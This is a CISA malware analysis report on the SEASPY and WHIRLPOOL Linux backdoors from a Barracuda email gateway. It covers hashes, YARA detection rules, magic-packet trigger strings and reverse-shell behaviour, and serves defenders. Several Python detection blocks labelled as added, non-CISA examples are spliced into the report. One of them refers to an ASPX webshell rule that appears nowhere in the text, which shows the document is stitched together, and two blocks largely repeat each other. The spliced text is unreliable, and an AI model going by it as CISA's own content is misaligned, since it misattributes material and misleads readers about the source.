Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

August 9, 2023

MAR-10454006.r4.v2 SEASPY and WHIRLPOOL Backdoors | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained four malware samples, including the SEASPY and WHIRLPOOL backdoors, from a Barracuda Email Security Gateway (ESG) appliance. The appliance was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting ESG versions 5.1.3.001-9.2.0.006.

SEASPY is a persistent, passive backdoor that masquerades as a legitimate Barracuda service, “BarracudaMailService”, and allows the threat actors to execute arbitrary commands on the ESG appliance.

WHIRLPOOL is a backdoor that establishes a Transport Layer Security (TLS) reverse shell to the Command-and-Control (C2) server.

For information about related malware, specifically information on the initial exploit payload, a second SEASPY backdoor variant, and the SUBMARINE backdoor, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-221A PDF (PDF, 382.40 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-221A JSON (JSON, 49.40 KB )
Submitted Files (4)

29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b (QuoVadis_Root_CA_1_G3.pem)

3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115 (BarracudaMailService.old)

83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c (rverify)

9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf (resize_reisertab)

Findings

3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115

Tags

trojan

Details


Name BarracudaMailService.old
Size 2924217 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=598b486976708dc59ecf3fdec8727b82df63b7de, with debug_info, not stripped
MD5 4ca4f582418b2cc0626700511a6315c0
SHA1 0ea36676bd7169bcbf432f721c4edb5fde0a46a9
SHA256 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
SHA512 71e0aaaf8981782ccb09331548d2458671d1dd65433052e44583ece98fffda9b6f0a3805d6d9c653dd0e1378602a7c1a3b0482a563b6644af49c908876ec1a3b
ssdeep 49152:X7PdfV6LWGqla76yHbSgfrNr1glmyifFTZwwP80WhpKG:zdfBlm6cbxr1pDw30WhpKG
Entropy 6.167504
Malware Result unknown
Antivirus
AhnLab HackTool/Linux.Reverseshell
Antiy Trojan/Win32.Casdet
Bitdefender Trojan.Linux.Generic.298175
Emsisoft Trojan.Linux.Generic.298175 (B)
ESET Linux/SeaSpy.A trojan
McAfee ELF/Barracuda.a
Quick Heal ELF.Barracuda.47823.GC
Sophos Linux/Agnt-BS
Varist E64/SeaSpy.A
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
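To make the hex patterns in this rule readable, and likewise those of rule CISA_10430311_03 for the ASPX webshells earlier on this page, and to step through how the conditions combine, here is an added example in Python. It is not CISA's code and not a YARA implementation; the sample buffers it scans are constructed for the demonstration. One point it makes explicit: YARA gives "and" higher precedence than "or", so the SEASPY condition reads "(ELF magic and all of $s*) or (all of $a*)", and a buffer without the ELF magic that contains all four $a* patterns still matches.

```python
# Added example, not part of the CISA report and not a YARA implementation:
# a minimal evaluator for the hex-string rules quoted in this report, so the
# byte patterns can be read as text and the condition logic stepped through.
import struct


def hexstring(pattern: str) -> bytes:
    """Convert a YARA hex string such as '{ 4f 57 41 }' into raw bytes."""
    return bytes.fromhex(pattern.strip().strip("{}"))


def readable(pattern: bytes) -> str:
    """Show a pattern as text, escaping bytes outside printable ASCII."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in pattern)


def matched(buf: bytes, strings: dict) -> set:
    """Names of the rule strings that occur anywhere in buf."""
    return {name for name, pat in strings.items() if pat in buf}


# Strings of rule CISA_10430311_03 (ASPX webshell), copied from the report.
ASPX_STRINGS = {
    "$s1": hexstring("{ 5a 30 32 6a 77 36 43 36 63 55 }"),
    "$s2": hexstring("{ 5a 38 49 30 32 38 33 6e 77 38 }"),
    "$s3": hexstring("{ 4f 57 41 77 65 62 63 6f 6e 66 69 67 }"),
    "$s4": hexstring("{ 54 55 43 53 4f 4e }"),
    "$s5": hexstring("{ 65 76 61 6c }"),
}


def aspx_webshell_rule(buf: bytes) -> bool:
    """condition: 3 of them"""
    return len(matched(buf, ASPX_STRINGS)) >= 3


# Strings of rule CISA_10452108_01 (SEASPY), copied from the report.
SEASPY_S = {
    "$s0": hexstring("{ 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }"),
    "$s1": hexstring("{ 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }"),
    "$s2": hexstring("{ 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }"),
    "$s3": hexstring("{ 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }"),
    "$s4": hexstring("{ 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }"),
    "$s5": hexstring("{ 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }"),
    "$s6": hexstring("{ 5b 2a 5d 53 75 63 63 65 73 73 21 }"),
}
SEASPY_A = {
    "$a7": hexstring("{ bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }"),
    "$a8": hexstring("{ 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }"),
    "$a9": hexstring("{ 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }"),
    "$a10": hexstring("{ c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }"),
}


def is_elf(buf: bytes) -> bool:
    """YARA's uint32(0) is little-endian: 0x464c457f is the byte sequence 7f 45 4c 46."""
    return len(buf) >= 4 and struct.unpack_from("<I", buf, 0)[0] == 0x464C457F


def seaspy_rule(buf: bytes) -> bool:
    """condition: uint32(0) == 0x464c457f and (all of ($s*)) or (all of ($a*))

    'and' binds tighter than 'or' in YARA, so this is
    (ELF magic and all $s*) or (all $a*): the $a* branch never checks the magic.
    """
    all_s = matched(buf, SEASPY_S) == set(SEASPY_S)
    all_a = matched(buf, SEASPY_A) == set(SEASPY_A)
    return (is_elf(buf) and all_s) or all_a


# Constructed sample buffers (not real samples) that exercise the conditions.
ASPX_HIT = b"<%@ Page %> key=OWAwebconfig Z02jw6C6cU ... eval(code) ..."
ASPX_MISS = b"<%@ Page %> eval(TUCSON)"                     # only 2 of 5 strings
ELF_ALL_S = b"\x7fELF" + b"\x00".join(SEASPY_S.values())
NO_MAGIC_ALL_S = b"\x00\x00\x00\x00" + b"\x00".join(SEASPY_S.values())
NO_MAGIC_ALL_A = b"\x00\x00\x00\x00" + b"".join(SEASPY_A.values())

if __name__ == "__main__":
    for name, pat in {**ASPX_STRINGS, **SEASPY_S}.items():
        print(f"{name:5} {readable(pat)}")
    print("ASPX_HIT matches:", aspx_webshell_rule(ASPX_HIT))
    print("NO_MAGIC_ALL_A matches SEASPY rule:", seaspy_rule(NO_MAGIC_ALL_A))
```

Decoding the $s* strings also ties the rule back to the behaviour described below: "pcap_lookupnet: %s" is the libpcap setup, "enter open tty shell" and "[*]Success!" belong to the reverse shell, and "usage: ./BarracudaMailService <Network-Interface" is the argument string the malware expects.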
ssdeep Matches

No matches found.

Relationships
3f26a13f02... Related_To 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
Description

This artifact is a 64-bit Executable and Linkable Format (ELF) file that has been identified as a "SEASPY" malware variant installed as a system service. The malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen for commands received from the Threat Actor's (TA's) C2 through TCP packets. When executed, the malware uses a libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (Simple Mail Transfer Protocol (SMTP)) and TCP port 587. It checks each captured network packet for the hard-coded string "oXmp". When the right sequence of packets is captured, it establishes a TCP reverse shell to the TA's C2 server for further exploitation, allowing the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument--
Usage: "./BarracudaMailService <Network-Interface>"
Sample: "./BarracudaMailService eth0"
--End argument--

29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b

Details

Name QuoVadis_Root_CA_1_G3.pem
Size 2698 bytes
Type POSIX shell script, ASCII text executable
MD5 2d841cb153bebcfdee5c54472b017af2
SHA1 7a791d4d7e55d7a2fdc08ac0f22ab7ae068fdf26
SHA256 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
SHA512 021c28dfd1a4136a6aa80fb86546655f4b0b8a9c528af157edc556074922553d58fa793b061a18316783b8b74eb38d3e08c5ece4eecc8fa4953ac0a556595cca
ssdeep 48:2LrIlobkq9g03Xxk7OnoDzHyvIoXirAAAt6KWejvPqRvOojmJL0pNZiWtDjE5:2Lzbhg0nusoH2IoXirArMgqVmJL0pNZw
Entropy 5.234290
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_10 : trojan persists_after_system_reboot
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-20"
           Last_Modified = "20230726_1700"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "persists-after-system-reboot"
           Malware_Type = "trojan"
           Tool_Type = "unknown"
           Description = "Detects script samples known to start SEASPY after reboot"
           SHA256 = "29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b"
       strings:
           $s1 = { 21 20 2d 64 20 24 7b 72 63 5f 62 61 73 65 7d 2f 72 63 24 7b 72 75 6e 6c 65 76 65 6c 7d 2e 64 }
           $s2 = { 52 75 6e 6e 69 6e 67 20 73 63 72 69 70 74 73 20 66 6f 72 20 72 75 6e 6c 65 76 65 6c 20 24 72 75 6e 6c 65 76 65 6c }
           $s3 = { 5b 20 2d 66 20 24 7b 70 72 65 76 5f 73 74 61 72 74 7d 20 5d 20 26 26 20 5b 20 21 20 2d 66 20 24 7b 73 74 6f 70 7d 20 5d 20 26 26 20 63 6f 6e 74 69 6e 75 65 }
           $s4 = { 24 7b 69 7d 20 73 74 61 72 74 20 3e 3e 2f 72 6f 6f 74 2f 62 6f 6f 74 2e 6c 6f 67 20 32 3e 3e 2f 72 6f 6f 74 2f 62 6f 6f 74 2e 6c 6f 67 }
           $s5 = { 2f 73 62 69 6e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
29a41174eb... Related_To 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
Description

This artifact is an initialization script. Upon execution it resets the terminal settings to their defaults using the 'stty sane' command. It then sets a runlevel variable and stops the services that were started by the previous runlevel, and kills any services still running on the current runlevel. Next, the script starts the services associated with the current runlevel. After the logging functionality is started, the script checks whether the runlevel is 3, in which case the terminal screen is cleared using /usr/bin/clear. Finally, the script ends with the command "/sbin/BarracudaMailService eth0": whenever the initialization script runs, BarracudaMailService is started automatically on the network interface eth0. BarracudaMailService is a known name for the SEASPY backdoor.

Screenshots
Figure 1

Figure 1. - At the end of the script the string "/sbin/BarracudaMailService eth0" is specified.

9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf

Tags

trojan

Details

Name resize_reisertab
Size 2549176 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=c971d01d9faa9d7fd94aef13b24e0b5d3d149a7c, stripped
MD5 45b79949276c9cb9cf5dc72597dc1006
SHA1 191e16b564c66b3db67f837e1dc5eac98ff9b9ef
SHA256 9bb7addd96f99a29658aca9800b66046823c5ef0755e29012983db6f06a999cf
SHA512 0f4307b5f48c193c1036b56b3cf569f79cb8fc2306f8f796d5548bcd5a96fc52127d2186d980c71d5917eb6d6026e92405a3cd453011503515e2e4f3311201c3
ssdeep 49152:4TnrmLlCGFyVfj+QCH2qirsZZrnYgBbfhceT+c02:KnrXxj317rs/NocJ
Entropy 6.227206
Malware Result unknown
Antivirus
AhnLab Trojan/Linux.SeaSpy.2549176
Antiy Trojan/Linux.SeaSpy.a
Bitdefender Trojan.Linux.Generic.298117
Emsisoft Trojan.Linux.Generic.298117 (B)
ESET a variant of Linux/SeaSpy.A trojan
IKARUS Trojan.Linux.Seaspy
Varist E64/SeaSpy.A
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
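To make the rule above concrete, here is a plain-Python re-implementation of its matching logic; this is an added example, not part of the CISA report. It decodes the rule's hex strings (the $s* group is readable text from the binary, the $a* group is four 16-byte code sequences) and evaluates the condition the way YARA parses it: 'and' binds tighter than 'or', so "uint32(0) == 0x464c457f and (all of ($s*)) or (all of ($a*))" is satisfied by any file that contains all four $a* sequences, whether or not it begins with an ELF header. A second function shows the stricter reading with the ELF check applied to both branches. The sample buffers are constructed for the demonstration and are not real binaries.

```python
"""
Plain-Python re-implementation of what rule CISA_10452108_01 matches, to make
its hex strings readable and to show how YARA parses its condition.
Added example, not part of the CISA report; the sample buffers are constructed.
"""
import struct

# Hex strings copied verbatim from the rule's 'strings:' section;
# bytes.fromhex() ignores the spaces between byte values.
S_STRINGS = {
    "s0": bytes.fromhex("2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30"),
    "s1": bytes.fromhex(
        "75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C "
        "53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65"
    ),
    "s2": bytes.fromhex("65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c"),
    "s3": bytes.fromhex("25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65"),
    "s4": bytes.fromhex("70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73"),
    "s5": bytes.fromhex("43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64"),
    "s6": bytes.fromhex("5b 2a 5d 53 75 63 63 65 73 73 21"),
}
A_STRINGS = {
    "a7": bytes.fromhex("bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d"),
    "a8": bytes.fromhex("81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e"),
    "a9": bytes.fromhex("6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7"),
    "a10": bytes.fromhex("c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8"),
}
ELF_MAGIC = 0x464C457F  # little-endian uint32 of the bytes 7f 45 4c 46 ("\x7fELF")


def decode_text_strings():
    """The $s* strings as text, the way an analyst would read them."""
    return {name: pattern.decode("latin-1") for name, pattern in S_STRINGS.items()}


def uint32_at(data, offset):
    """YARA's uint32(offset): little-endian unsigned read, None if the buffer is too short."""
    if len(data) < offset + 4:
        return None
    return struct.unpack_from("<I", data, offset)[0]


def all_present(data, group):
    """'all of ($x*)': every pattern of the group occurs somewhere in the buffer."""
    return all(pattern in data for pattern in group.values())


def rule_matches(data):
    """The published condition, with YARA's precedence made explicit:
    (ELF header and all $s*) or (all $a*).  The $a* branch needs no ELF header."""
    is_elf = uint32_at(data, 0) == ELF_MAGIC
    return (is_elf and all_present(data, S_STRINGS)) or all_present(data, A_STRINGS)


def rule_matches_elf_only(data):
    """Stricter reading: the ELF header check applies to both string groups."""
    is_elf = uint32_at(data, 0) == ELF_MAGIC
    return is_elf and (all_present(data, S_STRINGS) or all_present(data, A_STRINGS))


def build_sample(header, groups):
    """Constructed buffer: the given header, padding, then every pattern of the groups."""
    body = bytearray(b"\x00" * 16)
    for group in groups:
        for pattern in group.values():
            body += pattern + b"\x00" * 8
    return header + bytes(body)


SAMPLE_ELF_S = build_sample(b"\x7fELF\x02\x01\x01" + b"\x00" * 9, [S_STRINGS])  # ELF header, all $s*
SAMPLE_NONELF_A = build_sample(b"MZ" + b"\x00" * 14, [A_STRINGS])              # no ELF header, all $a*
SAMPLE_NONELF_S = build_sample(b"MZ" + b"\x00" * 14, [S_STRINGS])              # no ELF header, all $s*

if __name__ == "__main__":
    for label, data in (("elf+s", SAMPLE_ELF_S), ("nonelf+a", SAMPLE_NONELF_A), ("nonelf+s", SAMPLE_NONELF_S)):
        print(label, "published:", rule_matches(data), "elf-only:", rule_matches_elf_only(data))
```

Run the block directly to see the three constructed samples classified under both readings; the same functions can be pointed at a real file by passing open(path, "rb").read(). The difference between the two readings only matters for non-ELF input, but it is the kind of detail to check before relying on the header test to keep false positives down.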
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. This variant of SEASPY has had its symbols stripped. The malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service and is designed to listen for commands from the TA's C2, received as TCP packets.

When executed, the malware uses a libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks each captured network packet for the hard-coded string "TfuZ". When the right sequence of packets is captured, this SEASPY variant runs an authentication sequence before launching the reverse shell. Once the TA authenticates, the malware starts a reverse shell on the infected system, allowing the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument--
Usage: "./BarracudaMailService <Network-Interface>"
Sample: "./BarracudaMailService eth0"
--End argument--
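A defender-side check for the trigger traffic described in the SEASPY descriptions above (both the "oXmp" and the "TfuZ" markers), as an added example that is not part of the CISA report: it parses a raw Ethernet/IPv4/TCP frame and flags segments bound for TCP port 25 or 587 whose payload carries one of the marker strings. Because the report notes that the marker may differ between variants, the marker list is a starting point rather than a complete signature. The frames, IP addresses and ports below are constructed for the demonstration; checksums are left zero because the parser does not verify them.

```python
"""
Passive detection of the SEASPY trigger traffic described in the report: parse
a raw Ethernet/IPv4/TCP frame and flag segments to TCP port 25 or 587 whose
payload carries one of the hard-coded marker strings.
Added example, not part of the CISA report; the frames below are constructed.
"""
import struct

WATCHED_PORTS = {25, 587}      # ports the report says the sniffer watches
MARKERS = (b"oXmp", b"TfuZ")   # markers named in the report; other variants may differ


def parse_frame(frame):
    """Return (src_ip, dst_ip, src_port, dst_port, payload) for an IPv4/TCP frame,
    or None for any other frame or for truncated input."""
    if len(frame) < 14 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return None                                    # not IPv4 over Ethernet
    ip = frame[14:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ihl < 20 or ip[9] != 6 or total_len > len(ip):
        return None                                    # bad header, not TCP, or truncated
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    src_port, dst_port = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    if data_off < 20 or data_off > len(tcp):
        return None
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    return src_ip, dst_ip, src_port, dst_port, tcp[data_off:]


def classify_frame(frame):
    """Return a finding dict if the frame looks like a SEASPY trigger packet, else None."""
    parsed = parse_frame(frame)
    if parsed is None:
        return None
    src_ip, dst_ip, src_port, dst_port, payload = parsed
    if dst_port not in WATCHED_PORTS:
        return None
    for marker in MARKERS:
        if marker in payload:
            return {"src": f"{src_ip}:{src_port}", "dst": f"{dst_ip}:{dst_port}",
                    "marker": marker.decode("ascii")}
    return None


def build_frame(src_ip, dst_ip, src_port, dst_port, payload):
    """Constructed Ethernet/IPv4/TCP frame with zero checksums (the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split("."))) + tcp
    return b"\x00" * 12 + struct.pack("!H", 0x0800) + ip


# Constructed sample traffic using documentation address ranges.
SAMPLES = {
    "normal_smtp": build_frame("192.0.2.10", "198.51.100.5", 40000, 25, b"EHLO mail.example.test\r\n"),
    "marker_to_25": build_frame("192.0.2.10", "198.51.100.5", 40001, 25, b"\x00\x00oXmp\x00"),
    "marker_to_587": build_frame("192.0.2.10", "198.51.100.5", 40002, 587, b"TfuZ"),
    "marker_to_443": build_frame("192.0.2.10", "198.51.100.5", 40003, 443, b"oXmp"),
}

if __name__ == "__main__":
    for label, frame in SAMPLES.items():
        print(label, classify_frame(frame))
```

The same classify_frame() can be fed frames read from a pcap file; a hit on port 25 or 587 that carries one of these markers is worth a look, but the marker may differ in other variants, so absence of a hit does not clear an appliance.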

83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c

Tags

trojan

Details

Name rverify
Size 2646516 bytes
Type ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=fb2cdec59a77c255bd422c92e5de2d0f3f19bd6c, with debug_info, not stripped
MD5 85c5b6c408e4bdb87da6764a75008adf
SHA1 5ce46efc6b28bd94955138833dc97916957dbde1
SHA256 83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c
SHA512 4aef99afc89062387b4987d49e5128ae37a3c25b59f05ccf324e593c67a8f5bd96e1f883d77225dbd0cc9456d736c90dd890bbead6082a14ae9f06abf07f87d8
ssdeep 49152:FKuknP+5ada3TUFChbGh7eMKPEGqnVoqqEoLC+2U:tkP+M834FChbGh7rE2+2U
Entropy 6.540106
Malware Result unknown
Antivirus
Adaware Unavailable (production)
AhnLab Trojan/Linux.Whirpool.2646516
Antiy Trojan/Linux.Agent.wl
Avira LINUX/Agent.shpuf
Bitdefender Trojan.Linux.Generic.298125
Emsisoft Trojan.Linux.Generic.298125 (B)
ESET a variant of Linux/WhirlPool.A trojan
IKARUS Trojan.Linux.Agent
McAfee Trojan-FVEB!85C5B6C408E4
Sophos Linux/Agnt-BS
Varist E32/Agent.HC
YARA Rules
  • rule CISA_10452108_02 : WHIRLPOOL backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230804_1730"
           Actor = "n/a"
           Family = "WHIRLPOOL"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux WHIRLPOOL samples"
           SHA256_1 = "83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c"
           SHA256_2 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
       strings:
           $s0 = { 65 72 72 6f 72 20 2d 31 20 65 78 69 74 }
           $s1 = { 63 72 65 61 74 65 20 73 6f 63 6b 65 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $s2 = { c7 00 20 32 3e 26 66 c7 40 04 31 00 }
           $a3 = { 70 6c 61 69 6e 5f 63 6f 6e 6e 65 63 74 }
           $a4 = { 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $a5 = { 73 73 6c 5f 63 6f 6e 6e 65 63 74 }
       condition:
           uint32(0) == 0x464c457f and 4 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is a 32-bit ELF file that has been identified as a malware variant named "WHIRLPOOL". The malware takes two arguments (C2 IP and port number) from a module to establish a Transport Layer Security (TLS) reverse shell. The module that passes the arguments was not available for analysis.

Relationship Summary

3f26a13f02... Related_To 29a41174eb9a39e0ad712ed5063c561e9c2e1db1f8f6b04b2ca369a6efc3ac9b
29a41174eb... Related_To 3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
